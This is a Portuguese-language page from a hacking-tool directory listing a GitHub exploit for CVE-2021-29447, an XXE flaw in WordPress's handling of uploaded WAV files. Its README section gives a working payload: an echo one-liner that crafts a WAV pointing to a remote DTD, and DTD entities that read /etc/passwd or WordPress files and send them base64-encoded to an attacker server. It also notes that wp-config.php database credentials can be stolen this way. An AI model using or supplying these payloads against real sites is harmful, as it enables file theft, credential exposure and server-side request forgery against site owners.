Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-29447 — Exploit para CVE-2021-29447 que permite divulgação arbitrária de arquivos e SSRF no WordPress por meio de um arquivo WAV manipulado, com geração de payload PoC e DTD. | Kitploit
Ferramentas/GitHubGitHub/assassinukg/cve-2021-29447
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

Exploit para CVE-2021-29447 que permite divulgação arbitrária de arquivos e SSRF no WordPress por meio de um arquivo WAV manipulado, com geração de payload PoC e DTD.

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-29447

Impacto

Divulgação Arbitrária de Arquivos: o conteúdo de qualquer arquivo no sistema de arquivos do host poderia ser recuperado, por exemplo, wp-config.php que contém dados sensíveis como credenciais de banco de dados. Server-Side Request Forgery (SSRF): requisições HTTP poderiam ser feitas em nome da instalação do WordPress. Dependendo do ambiente, isso pode ter um sério impacto. Explorando a vulnerabilidade

Um site WordPress afetado por esta vulnerabilidade foi identificado no processo de enumeração com a ajuda da ferramenta wpscan.

image

Criando um arquivo WAV malicioso.

É muito fácil, no seu console bash

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Na sua máquina atacante, crie um dtd com o código a ser executado no servidor web.

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Nota: para ler arquivos do WordPress use a sintaxe "../WP-FILE.php"

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Hospede um servidor python no diretório dos arquivos (python3 -m http.server 8081)

Ref:

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

Baixar ferramenta